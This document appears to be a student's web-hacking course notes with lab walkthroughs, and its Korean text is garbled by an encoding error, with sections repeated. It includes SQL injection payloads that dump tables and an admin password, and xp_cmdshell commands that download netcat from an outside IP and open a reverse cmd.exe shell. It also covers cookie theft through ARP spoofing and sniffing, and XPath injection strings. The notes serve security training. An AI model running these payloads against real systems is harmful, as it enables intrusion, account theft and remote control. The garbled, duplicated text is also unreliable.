SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 12
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
Unexpercted Method ์ ์ก
๋์ผ์์ฒญ ๋ฐ๋ณต ์ ์ก
์ทจ์ฝ์ ์ค์บ(system)
Xscan
Nessus
n-stealth security scanner
์ทจ์ฝ์ ์ค์บ(Web Server amp WAS amp Web App)
APP SCANNER
ACUNETIX
NSTALKER SCANNER
์ค์บ ISSUE
BASIC DIGEST NTML CERT
FORM-BASED
์ธ์ฆ์ ๋ณด ์ค์
์ค์บ ๊ฐ๋(๋ฉํฐ ์ปค๋ฅ์ ํ์์์ ๊ณต๊ฒฉ๋ชจ๋๋น๊ณต๊ฒฉ๋ชจ๋)
๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
ACCOUNT ์์ง
OS์ ๋ณด์ ๋ฐ๋ฅธ ์ทจ์ฝ์ ์์ง
ํฌํธ๋ณ ์๋น์ค ์ทจ์ฝ์
์น์๋ฒ ์ ์ฒด๊ตฌ์กฐ ๋ถ์
์ฃผ์
ํ๋ ํ๋
์์ค๋ถ์
์ฟ ํค๋ถ์
์ธ์ ID์์ฑ ์ทจ์ฝ์ ๋ถ์
๊ณต๊ฒฉ
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
๋ฌด์์ ๊ณต๊ฒฉ
์ฌ์ ๊ณต๊ฒฉ
๊ณต๊ฒฉ์ด์
์์ง๋ ACCOUNT ์ ๋ณด๋ฅผ์ด์ฉ
OSNETWORK SERVICE ๊ณต๊ฒฉ
WEBSERVER WEBAPP SERVER WEBAPPLICATION
SQLISCANNER
๊ถํ ์์น
์ํ
ํ์์ ๋ณด ์์
Cookie Stealing
CSRF
์์ง
CSRF
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 13
์ ์ ์กฐ๊ฑด์ ๋ด๋ถ๋ง์ IP APPLICATION PARAMETERS ๋ฅผ ๋ชจ๋ ์๊ณ ์์ ๊ฒฝ์ฐ
CSRF๋ฅผ ํตํด DMZ์์ญ์ ์ ์ํ ๊ด๋ฆฌ์์๊ฒ ๋ด๋ถ ZONE์ชฝ์ผ๋ก ๊ฐ์ REQEUST๋ฅผ ํ๋๋ก ์กฐ์ ๊ฐ๋ฅ
OWASPWASC
์์์
์น ์ดํ๋ฆฌ์ผ์ด์ ์ทจ์ฝ์ ๊ณต๊ฒฉ
์ํ๋์ ๋ฐ๋ผ ๊ณต๊ฒฉ
๊ฐ์ฉ์ฑ์ ๋จ์ดํธ๋ฆฌ๋ ๊ณต๊ฒฉ์ ์ธ
์๋ฒ์ shellํ๋ or๊ด๋ฆฌ์ ์ํธ ํ๋
๋ฐ์ดํฐ ์ด๋ ํ์ฉ๊ธ์ง
Ethical Hacking์ธ ๊ฒฝ์ฐ ๊ณ ๊ฐ์ ์๊ตฌ์ฌํญ ๋ฐ์
์คํ์ ๊ฑฐ
์น ์ทจ์ฝ์ ์ค์บ๋ ๊ฒฐ๊ณผ ๋ถ์
ONE WAY WEB HACKING ์ฝ์ด๋ณด๊ธฐ
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 14
SQL INJECTION
GETPOST ํ๋ผ๋ฏธํฐ HTTP REQUEST ํ๋ผ๋ฏธํฐ ์ฟ ํค ๊ฐ
๊ธฐํ ์๋ฒ์์ ์ฒ๋ฆฌํ๋ ๋ชจ๋ ํด๋ผ์ด์ถํธ ๊ฐ
ํด๋ผ์ด์ถํธ ์ ๋ ฅ ๊ฐ ์ ํ
ํด๋ผ์ด์ถํธ์์ ์ ๋ ฅ๋ ๊ฐ์ด ์ ํจ์ฑ ๊ฒ์ฆ๊ณผ์ ์์ด sql ๋ฌธ์ ํฌํจ๋๋ ๊ฒฝ์ฐ
MAIN CAUSE
Impact
์ธ์ฆ์ฐํ
๋ฐ์ดํฐ๋ฒ ์ด์ค ๋คํ ์กฐ์ ์์ฑ ํ๊ดด
DML D์ด ๋ฑ ์์ํ ์ ์๋ ๋ชจ๋ ์์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ปจํธ๋กค
์์คํ ๋ช ๋ น์ด ์คํ
COUNTERMEASURE
์ ๋ ฅ๊ฐ ๊ฒ์ฆ
์ต์๊ถํ ๋ถ์ฌ(SYSTEMDBMSDatabase)
์ธ์ฆ์ฐํ
์ธ๊ฐ๋ ์ฌ์ฉ์์ ID PW ๋ฅผ ์ ๋ ฅํ์ง ์๊ณ ๋ ์ธ์ฆ์ ์ฐํํ๋ ํ์
ID PW๋ฅผ ๋ชจ๋ฅด๋ ์ํ์์๋ ์ ์ ํ ๊ตฌ์ฑ๋ ๋ฌธ์์ด์ ์ ๋ ฅํ์ฌ ์ธ์ฆ์ ์ฐํํ๋ ๊ฒ์ด ๊ฐ๋ฅ
์ ๋ ฅ๋ ๋ฌธ์์ด์ SQL ๋ฌธ์ ์ผ๋ถ๋ก ์ฝ์ ์ด ๋์ด ์คํ๋จ
์ธ์ฆ ์ฐํ์ ์ฌ์ฉ๋๋ ์ ๋ ฅ๊ฐ์
๋ฌธ๋ฒ์ ์ค๋ฅ๋ฅผ ์ํค์ง ์์์ผ ํจ
WHERE์ ์ ์กฐ๊ฑด์ด ํญ์ ์ฐธ์ด ๋๋๋ก ์กฐ์
์น ์ ํ๋ฆฌ์ผ์ด์ ์ ์ผ๋ฐ์ ์ธ ์ธ์ฆ ์ ์ฐจ
1IDPW ์ ๋ ฅ
2SQL Query ์์ฑ
3DATABASE์ ์ฟผ๋ฆฌ ์ ์ก
4DATABASE์์ ์ฟผ๋ฆฌ๋ฌธ ์คํ
5๋ฐํ๋๋ RETURN๊ฐ์ ๋ฐ๋ผ ์ธ์ฆ์ฌ๋ถํ๋จ
SQL INJECTION ์ ์ฐจ
DB ์คํค๋งํ์ (DBTABLECOLUMN ํ๊ฒฝ์ ๋ณด๋ฑ ํ์
๋ฐ์ดํฐ๋ฒ ์ด์ค ์ด๋ฆ ํ์
ํ ์ด๋ธ์ด๋ฆ ํ์
์ปฌ๋ผ์ด๋ฆ ํ์
๋ชจ๋ SQL INJECTION์ ์ ๋ ฅ๊ฐ์ ๋ํ ์ ํจ์ฑ ๊ฒ์ฆ์ ํ์ง ์๊ธฐ ๋๋ฌธ์ ๋ฐ์ํ๋ค ์๋ฌ๋ฅผ ์ ๋ํ์ฌ ํ๋์ ์ ๋ณด๋ฅผ ๋์ถ์ํจ๋ค
DBMS ๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ๋ ์ง์คํธ๋ฆฌ์ ์ ๊ทบํ๋ ๊ฒ์ด ๊ฐ๋ฅ
DBMS๊ฐ ์ ์ ํ ๊ถํ์ ๊ฐ์ง๊ณ ์๋ ๊ฒฝ์ฐ ์ฟผ๋ฆฌ๋ฅผ ํตํ ์๋น์ค ์ ์ด๊ฐ ๊ฐ๋ฅ
OYES MALL (SQL INJECTION์ ์ด์ฉํ ๊ด๋ฆฌ์ ๊ถํ ํ๋ ์ค์ต
ํ๊ฒฝ์(2000ASPMS-SQL2000)
์ค๋น๋ ์ผํ๋ชฐ์ด๋ค
์ฒซ๋ฒ์งธ ๋ฐฉ๋ฒ
Web Hacking 3์ผ์ฐจ
2007๋ 10์ 25์ผ ๋ชฉ์์ผ
์ค์ 1200
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 15
group by(user_id) -- ๋ฅผ ์ด์ฉํด ํ ์ด๋ธ์ ์์๋ธ๋ค
Member ํ ์ด๋ธ์์์๋ num์ด๋ผ๋ ์ปฌ๋ผ์ ํ ํด๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 16
union select from members where user_id like o ํด๋ด๋ผ ๋ก๊ทธ์ธ ๋ ๊ฑฐ๋ค
๋๋ฒ์งธ ๋ฐฉ๋ฒ
์ฃผ์๋ก์กฐํ ๋ถ๋ถ์ SQL INJECTION์ ํ์๋ค
$UNION SELECT 1234TABLE_NAME FROM INFORMATION_SCHEMATABLES-- ์๊ฐ์ด ์ง์๋ฅผ ํ๋ฉด ํ ํด๋ธ๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 17
์ฐ๋ฆฌ๋ members ๋ผ๋ ํ ์ด๋ธ์ด ์กด์ฌํ๋ ๊ฒ์ ๋ณผ์ ์์ ๊ฒ์ด๋ค
$UNION SELECT 1234 COLUMN_NAME FROM INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME= members --
Members์ ๋ํ ์ปฌ๋ผ์ ํ ํด๋ธ๋ค
$ or 1=(select top 1 user_id from members)--
User id์ ์ปฌ๋ผ์ top 1 ์ธ๊ฒ์ ํ ํด๋ธ๋ค
union select 1234 user_idpasswd from members where user_id=oyes --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 18
์ผ์~password ๊ฐ oyesmall ์ด๋ผ๋ค ์ค์ต ๋
File Uploading
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc2000exe --
$$ exec masterxp_cmdshell nc1000exe 2112406877 7777 -e cmdexe --
์์ฃผ ๊ฐ๋จํ๋ค
$$ exec masterxp_cmdshell tftp -i 2112406869 get ncexe nc6249exe ampamp nc -e cmdexe 2112406877 6249 --
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 19
OPTIONS ์๋ต ๊ฐ๋ฅํ HTTP๋ฉ์๋๋ฅผ ์์ฒญ
CONNECT ํฐ๋๋ง์ ๋ชฉ์ ์ผ๋ก ์ฐ๊ฒฐ์์ฒญ(Proxy ์ฐ๊ฒฐ)
GETPOST ๋ฉ์๋
GET๊ณผ POST๋ ์๋ฒ์ ์์์ ์์ฒญํ๋ ์ฌ์ฉ๋จ
GET๋ฐฉ์ POST๋ฐฉ์
์๋ฒ์ ์ ๋ฌํ๊ณ ์ํ๋ ๋ฐ์ดํฐ๋ฅผ URL ์ ํฌํจ์ํด
์ ์กํ ์ ์๋ ๋ฐ์ดํฐ๋์ด ์ ํ๋จ(2K4K)
์๋ฒ์ ์ ๋ฌํ ๋ฐ์ดํฐ๋ฅผ REQUEST Body์ ํฌํจ์ํด
๋ฐ์ดํฐ ์ ์ก๋์ ์ ํ์ด ์์(์๊ฐ์ ํ๊ฐ๋ )
GET loginaspuser_id=adminampuser_pass=1234
HOSTwwwsitecom
POST loginasp HTTP11
HOSTwwwsiteorg
User_id=admin user_pass=1234
get๋ฐฉ์(์น ๋ก๊ทธ๋ 8000์ ๊น์ง๋ง ์ ์ฅํ๋ค)
HEAD ๋ฉ์๋
TRACE ๋ฉ์๋
WEBDAV ๊ด๋ ฆ๋ฉ์๋
PUT
COPY
MOVE
DELETE
MAKECOL
PUT๋ฉ์๋ ์ฌ์ฉ์์
PUT HTTPWWWKISECCOMindex11html HTTP1O
HOSTWWWKISECCOM
Content-Length30
User-AgentBlaBla Client
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 4
User-AgentBlaBla Client
HTTP RESPONSE์ ์ฃผ์ ์๋ต ์ฝ๋
์ฃผ์ ์๋ต์ฝ๋
200 OK 400 BadRequest
201 Created 401 Unauthorized
202 Accepted 403 Forbidden
404 Not Found 301 Moved permanently
302 Found 500 Internal Server Error
HTTP ๊ด๋ ฆ ๊ธฐ์
์ฟ ํค
94๋ ๋ท์ค์ผ์ดํ์์ ๊ฐ๋ฐ
์๋ฒ๊ฐ ์์ฑํ๊ณ ํด๋ผ์ด์ถํธ์ ์ ์ฅ์ํค๋ ๋ฐฉ์
์ ์ฅ์๊ตฌ์ (Persistent๋์คํฌ)๋ฐ์๊ตฌ์ (Non-Persistent ๋ฉ๋ชจ๋ฆฌ)
๋ณด์๋ณด์๋น๋ณด์
์ ํํฌ๊ธฐ์ ํ(4k)๋ณ์์ ํ(2k)
ํ๋ฒ ์ ์ฅ๋ ์ฟ ํค๋ ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ์ด ์ง๋์ง ์๋ ํ ํด๋น ๋๋ฉ์ธ์ ์ ์์ ๋ธ๋ผ์ฐ์ ๊ฐ ์๋์ผ๋ก ํ์ฌํ์ฌ ์ ์ก
ํ๊ฒ ๋จ
์ฟ ํคํ์ผํํ์ฌ์ฉ์์ด๋ฆ์ ์ํ์ฌ์ดํธ
์ฟ ํคํ์ผ๋ด์ฉ๊ฐ๋ฐ์๊ฐ ์ค์ ํ๊ธฐ ๋๋ฆ
๋ํดํธ ๋๋ ํ ๋ฆฌ CDocuments and Setting์ฌ์ฉ์์ด๋ฆCookies
๊ธฐ๋ณธํฌ๋งท
Set-cookie
Name=value ์ฟ ํค์ ์ด๋ฆ
Expire=date ์ฟ ํค์ ์ ํจ๊ธฐ๊ฐ
Domain=domain ๋๋ฉ์ธ
Path=path ์ฟ ํค๋ฅผ ์ด์ฉํ์ฌ ์ ์์ฌ๋ฅํ URL
Secure ๋ณด์๋น๋ณด์์ค์
๊ด๋ ฆ ISSUE
์ฌ์ฉ์ ์์์กฐ์ ๋ฐ ์ค๋ํ ํ๋ก์ ๋ฑ์ ํตํ ๋ณ์กฐ๊ฐ๋ฅ
XSS๋ฑ์ ํตํ ํ์ธ์ ์ฟ ํคํ์ทจ
์ฌ์๊ณต๊ฒฉ์ ๋ฌด๋ฐฉ๋น
๋์๋ฐฉ์ ์ฟ ํค๋ ์ฌ์ฉํ์ง ์๋๋ค๋ ๊ธฐ๋ณธ ์ฒ ์น ์ฌ์ฉํ ๊ฒฝ์ฐ ๊ฒ์ฆ๋ ์ํธํ ์๊ณ ๋ฆฌ์ฆ์ผ๋ก ์ต์ํ์ ์ ๋ณด๋ง
์ ์ฅ ์ฟ ํค์ ๋ฌด๊ฒฝ์ค ๊ฒ์ฌ๋ฅผ ์ํด ์ ์ก๋๋(ํน์ ๋ณ์ ๊ฐ+TimeStamp)๋ฑ์ ์ ๋ณด๋ฅผ ํด์ํ ๊ฐ๊น์ง ๊ฐ์ด
์ ์ก ์๋ฒฝํ์ง ์์ผ๋ ์ธ์ ๊ณผ ๊ฐ์ด ๋ณํ์ ๋ณด์์ฑ ํฅ์
์ธ์ (SESSION)
HTTP์ ์ ์ธ์ ์ ๋ํ ์ฒ๋ฆฌ๋ฅผ ๋ด๋นํ๋ ๊ธฐ์
Server Side ๊ธฐ์ ๋ก HTTP์ Stateless ํ ํน์ฑ์ ๋ณด์ํ๊ธฐ ์ํด Uniq ํ ID๋ฅผ ์์ฑํ์ฌ ํ์ฌ ์ ์ํ ํด๋ผ์ด์ถํธ์๊ฒ
ํ๋นํด์ฃผ๊ณ ๊ธฐ์ตํ๋ ๋ฐฉ์
๊ณผ๊ฑฐ cookie์ ์ ์ฅํ๋ ๋ณ์ ๊ฐ ์ ์ด๊ธฐ ์ ์ ์ ํ๋นํ๊ฒ ๋จ
ํ๋นํ ๋ณ์๋ ์๋ฒ์ ์ ์ฅ๋๋ฉฐ ํด๋ผ์ด์ถํธ ์ธก ์๋ ์ธ์ ID๋ง ๋ถ์ฌ๋จ
์ฃผ๋ก Web Application Server ๋ Web Server ๋ฅผ ํ๋น ๋ฐ์ผ๋ฉฐ ์ด๋ ํด๋น ID์ ํน์ ์ ๋ณด๋ฅผ ์ ์ฅํ ์ ์์
ํด๋ผ์ด์ถํธ๋ ์๋ฒ์ ํต์์ SESSION ID๋ง ์ฃผ๊ณ ๋ฐ์
์ธ์ ID
WASWS ์ธ์ ID๋ณ์
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 5
IIS ASPSESSIONID
APACHE SESSIONID
TOMCAT JSESSIONID
PHP PHPSESSID
๊ธฐํ JServerSessionID
JWSESSIONID
SESSID
SESSION
SID
SESSION_ID
์ธ์
WASWS ๋ง๋ค ๋ค๋ฅด์ง๋ง ๋ณดํต 10๋ถ20๋ถ ์ค์ ์
์ฌ์ฉ์๊ฐ ๋น์ ์ ๋ก๊ทธ์์ ํ๊ฑฐ๋ Request ์์ฒญ ์์ ์ ์ ํ์ ์์ ๊ฐ ์ด๊ณผ ํ ํด๋น ์ธ์ ID๋ ์๋ฉธ
์ธ์ ๋ ์ฟ ํค์ ๊ฐ์ ์ ํจ๊ธฐ๊ฐ ์์
๊ด๋ ฆ ISSUE
์ด๊ธฐ์ธ์ ๊ฐ์ฒด ์์ฑ์ ํด๋ผ์ด์ถํธ์ IP ๋ฉ์ธ๋ณด๋SN ํ๋๋์คํฌ SN๋ฑ Uniq ํ ๊ฐ์ ์ค์ ํ ํ ๋งค ํ์ด์ง๋ง๋ค
์ธ์ฆ๋น๊ต๋ฅผ ํตํด ๊ณต๊ฒฉ์ ์๋ฐฉํ ์ ์์
์ฌ์ฉ์ ์์์กฐ์์ ํตํ ๊ณต๊ฒฉ์๋
์ธ์ ์ด๊ธฐ ์์ฑ์๋ง๋ค ์๋ก์ด ID๋ฅผ ์์ฑ
์ฌ์๊ณต๊ฒฉ
์ค์ต
Cookie๊ฐ์ ์ค๋ํ ํด์ ์๋๋ฐฉ Cookie๊ฐ์ผ๋ก ์๋๋ฐฉ ๊ณ์ ์ผ๋ก ๋ก๊ทธ์ธ
์ค์ตํ๊ฒฝWinArpSpoof or CainampAbel or wireshark
Wireshark๋ก arp ์คํธํ์ ํด์ ํจํท์ด ๋์๊ฒ ๋๊ฒจ์ค๊ฒ ๋ง๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 6
ํ๋ฉด๊ณผ ๊ฐ์ด wireshark๋ฅผ ์ค๋นํ๋ค
์คํธํ์ ํ๊ณ ์์ผ๋ฉด ์๋๋ฐฉ ์ธก์์ wwwnavercom ์ ๋ก๊ทธ์ธ์ ํ๊ฒ ๋๋ฉด ํจํท์ด ๋ ๋ผ ์ค๊ฒ ๋๋ค ์ฌ๊ธฐ์ ์ฐ๋ฆฌ๋
๋ก๊ทธ์ธ ๊ด๋ ฆ ํจํท ๋ง ์์๋ณด๊ธฐ ์ํด ํํฐ์ httprequestmethod == POST ๋ฅผ ์น๋ค
๋ค์๊ณผ ๊ฐ์ด ๋์ฌ ๊ฒ์ด๋ค Set-Cookie๋ถ๋ถ์ ๋ณต์ฌํด ๋๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 7
๋ค์๊ณผ ๊ฐ์ด ์ค์ ์ ์กฐ๊ธ ๋ณ๊ฒฝ ์์ผ์ค๋ค
๋ค์๊ณผ ๊ฐ์ด ์ ํ ์ ํด๋๋ค
๊ทธ๋ผ ๋ค์๊ณผ ๊ฐ์ด ๋ก๊ทธ์ธ์ด ๋๋ ์ฅ๋ฉด์ ๋ณผ ์ ์์ ๊ฒ์ด๋ค
์ฌ๊ธฐ์๋ XSS๋ฅผ ์ฌ์ฉํ์ง ์๊ณ Network์์์ Cookie๊ฐ์ ํ์ณ์ ๊ณ์ ์ ํ์ณ ๋ณด์๋ค
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 8
XML ํน์ง
๋ฌธ์์ ๋ด์ฉ๊ณผ ๋์์ธ์ด ์์ ํ ๋ถ๋ฆฌ
๋ฌธ์๊ตฌ์กฐ๋ XML๋ก ํ๋ฆฌ์ ํ ์ด์ ์ XSL์ ํตํด
๋ค์ํ ๋ฐฉ์์ ๋งํฌ ๊ธฐ๋ฅ ์ ๊ณต
ํ์คํ๋ DTD์ ํตํด ๋ชจ๋ ๋ถ์ผ์ ์ฌ์ฉ๊ฐ๋ฅ
DOM(Document Object Model)
SAX(Simple API for XML)
XML๊ตฌ์กฐ2๊ฐ์ง ๋ํ์ ๋ชจ๋ธ์กด์ฌ
๊ตฌ์ฑ์์ ์ค๋ช
์๋ฆฌ๋จผํธ ๋งํฌ์ ํ๊ทธ์ ๊ทธ ์์ ํฌํจ๋ ๋ด์ฉ
๋น ์๋ฆฌ๋จผํธ ๋ด์ฉ์ ํฌํจํ์ง ์๋ ๋น ์๋ฆฌ๋จผํธ
๋ฃจํธ ์๋ฆฌ๋จผํธ ๋ฌธ์๋ด ๋ชจ๋ ์๋ฆฌ๋จผํธ์ ๋ด์ฉ์ ํฌํจํ๊ณ ์๋ XML ๋ฌธ์์ ์๋ฆฌ๋จผํธ
์์ฑ ์๋ฆฌ๋จผํธ์ ํฌํจ๋์ด ์ถ๊ฐ์ ์ธ ์ ๋ณด๋ฅผ ์ ๊ณต
ltimg src=balbalbalgtbalbalballtimggt
์ํฐํฐ ํ ์คํธ ๋ฐ์ด๋๋ฆฌ๋ฐ์ดํฐ ๋น ์์คํฌ ๋ฌธ์๋ฅผ ์ ์ฅํ๋๋ฐ ์ฌ์ฉ
์ฒ๋ฆฌ๋ช ๋ น ์ ์ฒด ๋ฌธ์๋ ๋ฌธ์์ ์ผ๋ถ๋ฅผ ์ฒ๋ฆฌํ๋ ์์ฉํ๋ก๊ทธ๋จ๊ณผ ์ฐ๊ฒฐํด ์ฃผ๋ ๋ช ๋ น์ด lt gt
์ฃผ์ XML ํ๋ก์ธ์๊ฐ ํด์ํ์ง ์๋ ์ค๋ช ๋ฌธ
lt-- --gt
CDATA์น์ ํน์ํ ๋ฌธ์๋ฅผ ์ผ๋ฐ ํ ์คํธ๋ก ์ธ์ํ๋๋ก ํ๋ ํ๊ธฐ๋ฒ
lt[CDATA[hellipstring]]gt
Xpath
Xml ๋ฌธ์์ ๋ํ ์ง์์ถ์ด
SQL๋ฌธ์ ํน์ ํ ์ด๋ธ์ ํ๊ณผ ์ด์ ์ ํ
Xpath๋ ํน์ XML๋ฌธ์์ ๋ ธ๋์ ๋ ธ๋์ ์ ์ ํ
๊ด๋ ฆ Issue
์)bookbook[ISBN=1111 or 1=1]
๋ชจ๋ book ๋ ธ๋๋ค์ ์ ๊ทบ๊ฐ๋ฅ
Xpath๊ณต๊ฒฉ
๋ํ ํ์ด๋ก๋ ๊ณต๊ฒฉ(like DOS)
XML์ ๋ ธ๋์ ์์ฑ์ด ์ค์ฒฉ ์ ์ถ๋ ์ ์๋ค๋ ์ ์ ์ ์ฉ
ํน์ ๋ ธ๋์์ ๋์ผ ๋ ธ๋๋ช ๋ฐ๋ณต์ ์ถ์์ฑ ๋ฌดํ์ ์ถ
์ฌ๊ท ํ์ด๋ก๋ ๊ณต๊ฒฉ
`or loginid(nodeLoginID())=LoginID or a=b
07๋ ํดํน๋ฐฉ์ด๋ํ๋ฌธ์
WebService
์ ์๋คํธ์ํฌ์์์ ์ ๊ทบ ๊ฐ๋ฅํ ์ํํธ์จ์ด ๊ธฐ๋ฅ๋จ์๋ก ํ๋ซํผ ํ๋ก๊ทธ๋๋ฐ ์ถ์ด ๋ฐ ์ปดํฌ๋ํธ ๋ชจ๋ธ์ ๋
๋ฆฝ์ ์ธ ๊ธฐ์ ๋ก ๋ง๋ค์ด์ง ์ํํธ์จ์ด
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
Web Hacking 2์ผ์ฐจ
2007๋ 10์ 23์ผ ํ์์ผ
์ค์ 934
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 9
์น ํดํน ๊ณต๊ฒฉ ์ ์ฐจ
FootPrinting Scanning Enumeration
PllferingEscalatingPrivledge
GainingAccess
CreatingBack Doors
CoveringTracks
๊ณต๊ฒฉ์ ์ฐจ
์ ๋ณด์์ง
Profiling
๋ถ์
Analysis
๊ณต๊ฒฉ
AttackEcploit
hellip
์ฌํ๊ณตํ
๊ฒ์์์ง
FootPrinting
PortScan
Web Site ๋ฏธ๋ฌ๋ง
Web ๊ตฌ์กฐ๋ถ์
์๋ฏธ์๋ ์ ๋ณด๋ก ๊ฐ๊ณต
Account ์์ง
OS์ ๋ณด์ทจ์ฝ์
ํฌํธ๋ณ์๋น์ค์ทจ์ฝ์
์ ์ฒด๊ตฌ์กฐ์์ค์ฃผ์
์ฟ ํค๋ฑ ๋ถ์
์ ๋ณด์ ๊ทบ๊ฑฐํ ๊ณต๊ฒฉ
BF Guessing
OSNetwork Service
Exploitation
๊ถํ์์น
OWASPWASC๋ฑ์ ์ํ ๊ณต๊ฒฉ
๋ณด๊ณ ์
1์ ๋ณด์์ง
์ฌํ๊ณตํ
๋๋ฉ์ธ ์ ๋ณด IP Block ์ ๋ณด
Whois
Dig
Whosip
Netcraft
๊ธฐ๋ณธ์ ๋ณด
httpwebarchiveorg
Google Cache
Web Archive
httpjohnnyihackstuffcom
์ฌ์ ์ฌ(googledorkpdf)
Google Dork
Google hacking DB ์ฌ์ฉ
Google API Key(ํค ๋ฐ๊ธ ํ์ง)
SiteDigger Wikto
๊ฒ์์์ง(No-Tech Hacking)
๊ตฌ๊ธ ํดํน ํค์๋ ์ ๊ณต ์ฌ์ดํธ
Footprinting Web Server
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 10
AFD(Acitive Filter Detection)
ICMP TTL๊ฐ์ ์กฐ์ ํด๊ฐ๋ฉฐ ์น ์๋ฒ ํ์ง
netcraftcom
Stealth Scan-sS
Normal Scan-sT-sU
Network Services Version Scan-sV
OSDetection-O-A
DoNotPing_P0
Idle scan
IDS์ฐํ
httpunicornscanorg
Unicorn scan -mT -p -v -r 2501921681024q
Unicornscan
Nc
jikto
Port Scan(Port Mapping)
httTrack
Web Site Mirroring
kisec ์นํดํน ๋ ธํธํ๊ธฐ ํ์ด์ง 11
-grepegrep awksedsortuniq(moreheadless)๋ฑ ํ์ฉ
Mirroring ํ ์ ์ ๋ถ์
balckwindow
InteliTamper
Wikto
Web๊ตฌ์กฐ ๋ถ์(๋ฐ์๋)
Httpwatch
TamperlE
Cooxie
LiveHttpHeaders(firefox)
Command line tool(nccurlopenssl)
Manual Analysis
ParosWebscrabFidderBurpIntruder
SoftwareProxy
Web๊ตฌ์กฐ๋ถ์(์์์ )
๊ด๋ฆฌ์ํ์ด์ง
์๋ฃ์ค(web shell)
ํต๊ณ ์ํ ํ์ด์ง
ํ์๋ฑ๋ก์ฐํธ๋ฒํธ ์กฐํ(์ธ์ ์ ๊ณต๊ฒฉ)
(์ธ์ ์ ์ ์ ๋ ฅ๊ฐ์ ๋ฃ์์๋ ๊ฒฐ๊ณผ๋ฅผ ๋ฟ๋ ค์ฃผ๋ ํ์ด์ง๋ฅผ ์ฐพ์์ผํ๋ค)์๋ณด์ฌ์ฃผ๋๊ฑด ๋ธ๋ผ์ธ๋ ์ธ์ ์
์ํธ๋ถ์ค(์ํธ ํ๋ ์์)
์ ๋ณด์์ (์ํ์์ง์์น๊ธฐํ)
ํ์๊ฐ์ ํ์ด์ง
๊ฒฐ์ ํ์ด์ง
Basic Banner Garbbing
Http resonse ํค๋ ์์
Http resonse ํค๋ ์กด์ฌ ์ ๋ฌด
Http resonse ํค๋์ ํน์ ๊ฐ
Tracehead ๋ฑ์ ๋ํ ์์ดํ ์๋ต
๋ฐ์ดํฐ์์ด ์ ์กํ put์ ๋ํ์๋ต
